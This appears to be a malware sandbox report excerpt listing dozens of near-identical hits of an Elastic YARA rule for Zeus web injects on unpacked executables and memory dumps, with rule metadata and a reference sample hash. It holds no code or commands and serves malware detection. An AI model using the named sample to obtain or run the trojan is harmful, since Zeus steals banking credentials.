Source: 2.3.svchost.exe.884000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.884000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.39.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 22.2.swvGCAxOMikYQeoQzimiprVu.exe.1282000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 33.2.swvGCAxOMikYQeoQzimiprVu.exe.12f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.22.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.35.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2500000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.88a000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 39.2.swvGCAxOMikYQeoQzimiprVu.exe.ed2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.21.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.19.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.Z8eHwAvqAh.exe.61e4c0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.2.Z8eHwAvqAh.exe.407000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 31.2.swvGCAxOMikYQeoQzimiprVu.exe.10b2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.32.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2085406801.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2140868615.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2143770562.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2147781586.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2140232259.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2117066204.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2059054571.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000025.00000002.2136733036.0000000000AE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2122713392.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2148028123.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001F.00000002.2117128490.00000000010B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2113736321.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2145570394.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2148606748.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2145310985.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2149174831.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2138544966.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2144590215.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001B.00000002.2110291091.0000000000AE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2060969300.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
